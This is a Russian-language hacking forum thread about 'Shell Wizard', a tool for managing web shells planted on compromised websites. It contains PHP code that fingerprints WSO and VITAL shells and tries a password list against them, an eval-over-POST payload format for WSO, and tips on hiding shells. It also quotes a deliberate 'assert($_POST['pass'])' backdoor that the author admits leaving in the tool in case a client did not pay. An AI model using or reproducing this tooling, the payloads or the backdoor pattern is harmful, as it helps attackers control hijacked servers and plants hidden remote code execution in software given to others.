RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Релизы/Releases (https://rdot.org/forum/forumdisplay.php?f=11)
-   -   [S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :) (https://rdot.org/forum/showthread.php?t=136)

Boddhisatva 23.11.2010 15:20

Как вариант - брать незапароленный WSO, и немного модифицировать его, чтобы работал только, например, при if($_GET['wso']=='launch'), или как там. И эту строку в настройках прописать.
Хоть какая-то безопасность от посторонних глаз.

Acez666 16.12.2010 00:34

досю себя в netstat ничего нету и в логах апатча. не досит чтоли?

Acez666 16.12.2010 01:07

а не поперло, надо 600 потоков ставить.

dasknix 26.12.2010 19:50

про защищенные (не обязательно пассами, можно создать свой способ):

увидел тут на днях шелвизард и дофига чего не устроило, хз, может я претенционзен,
либо сабжевый sh wiz ещё слишком молод. в любом случае спасибо автору, т.к. несмотря
на то что идея создать shm для автоматизации и управления была давно.. ну вы сами
знаете - идей дофига а на практике по проекту в полгода дай бог рожаем

написал свой, собссно пару фрагов кода, весь выложить не могу, за EP считаем shdet()
PHP код:

// sh pattz
    
$shpats = array(
         
T_VITAL =>    array(
             
def => array('<title>VITAL</title>')
            ,
auth => array(
                 
'input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}'
                
,'<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">'
             
)
            ,
auth_answ => array(
                 
'<meta http-equiv="refresh" content="1;URL='
                
,'<a style="font:12px Verdana" href="'
                
,'">Success</a>'
             
)
         )
        ,
T_WSO => array(
             
def => array("BOFF 1.0")
            ,
auth => array(
                 
"<pre align=center><b>Authorization</b><br>"
                
,"0ff \/\/"
                
,"<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
            
)
         )
        
#,T_CMAD => ""
        #,T_R57 => ""
    
); 

PHP код:

function shdet(array $sh){
    global 
$shpats;
    global 
$pwdz;
    global 
$shz;

    
$buf nw_get(M_GET$sh[url]);

    foreach(
$shpats as $shpat_type => $shpat){
        if(
inarr($shpat[def],$buf)){
            
mod($sh,    AUTH_NO,        auth,need);
            
mod($sh,    $shpat_type,    type);
            
mod($sh,    ONLINE,            status);
            
/*
                $shz[$sh[id]][auth][need]    = AUTH_NO;
                $shz[$sh[id]][type]            = $shpat_type;
                $shz[$sh[id]][status]        = ONLINE;
                $shz[$sh[id]][update]        = ONLINE;
            */
            
return true;
        }
    }

    foreach(
$shpats as $shpat_type => $shpat){
        foreach(
$shpat[auth] as $auth_pat){
            if(
strpos($buf$auth_pat) !== false){
                global 
$cookie;

                
$shz[$sh[id]][type] = $shpat_type;
                
$sh[type] = $shpat_type;
                
$shz[$sh[id]][auth][need] = AUTH_USE;

                
// auth to sh with current shpat type
                    
foreach($pwdz as $pw){
                        
$auth_answ make_auth($sh$pw);
                        if(
$shpats[$shpat_type][auth_answ][0])
                            
$auth inarr($shpats[$shpat_type][auth_answ], $auth_answ) ? OK false;
                        else
                            
$auth inarr($shpats[$shpat_type][def], $auth_answ) ? OK false;

                        if(
$auth){
                            
$shz[$sh[id]][auth][state] = OK;
                            
$shz[$sh[id]][auth][pw] = $pw;
                            
$shz[$sh[id]][auth][cook] = $cookie $cookie null;
                            return 
true;
                        }
                        global 
$auth_delay;
                        
sleep($auth_delay);
                    }
                
//

                
if(!$auth$shz[$sh[id]][auth][state] = FAIL;
                return 
true;
            }
        }
    }

    return 
false;


PHP код:

function make_auth(array $sh$pw){
    global 
$shz;

    
cook($sh);

    switch(
$shz[$sh[id]][type]){        // don' use local old $sh!
        
case T_VITAL:
            
$nwreq_method    M_POST;
            
$nwreq_fpath    $sh[url];
            
$nwreq_postargs    = array(
                                        
'doing'        => 'login'
                                    
,    'password'    => $pw
                                    
);
            
# $cookie        = array('phpspypass'    => $pw);

            
return nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case 
T_WSO:
            
$nwreq_method    M_POST;
            
$nwreq_fpath    $sh[url];
            
$nwreq_postargs    = array('pass'    => $pw);
            
            return 
nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case 
T_CMAD:
        break;
        case 
T_R57:
        break;
        default:
            return 
false;
    }


само собой делаем регексы, паттерны что
выше по strpos() сделаны на скорую руку

spiderbuber 25.03.2011 05:33

Также при чеке ошибка:
Цитата:

(12:09:42) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 X:\home\shwizard\www\includes\func.shell.php (line 61)
Пробовал на разных шеллах. Как поправить регулярку?

Хотелось бы увидеть в новой версии возможность чека не только ПР, но и ТИЦ + Стату ЛИ.РУ а также добавить несколько полей для произвольных меток и комметариев.

Cuko 09.12.2011 08:32

не работает скрипт=\ делаю на локал хосте, в xampp, не добавляет более одного шелла за раз, а по одному не айс как то.

curlbaby 11.12.2011 18:41

для WSO с паролем достаточно передать его по POST, как пример:

Цитата:

Сообщение от Nightmare (Сообщение 2116)
5) eval POST: a=Php&p1=[evalcode]


5) eval POST: pass=password&a=Php&p1=[evalcode]

(dm) 24.12.2011 18:04

Мне понравилась 33 строчка index.php:
Цитата:

if(!empty($_POST['pass']) && !assert($_POST['pass']))die();

M_script 25.12.2011 16:57

Цитата:

Сообщение от (dm)
Мне понравилась 33 строчка index.php

Так вот что означают слова "вместе c Dr.Z3r0" в названии темы.

Dr.Z3r0 28.12.2011 19:11

Цитата:

Сообщение от (dm) (Сообщение 22679)
Мне понравилась 33 строчка index.php:

упс, дико извиняюсь) осталось от старых версий))
тулза разрабатывалась на заказ, с заказчиком работал впервые поэтому был оставлен бекдор на случай если заказчик кинет.
я уже забыл про него :fpalm:

еще раз извиняюсь, я не спецом, серьезно)

UPD:
И дабы загладить свою вину, выкладываю новую версию 5.0. Изменения:
Цитата:

С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!
PS: в ней бекдоров нету... вроде...))


Часовой пояс GMT +3, время: 05:42.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot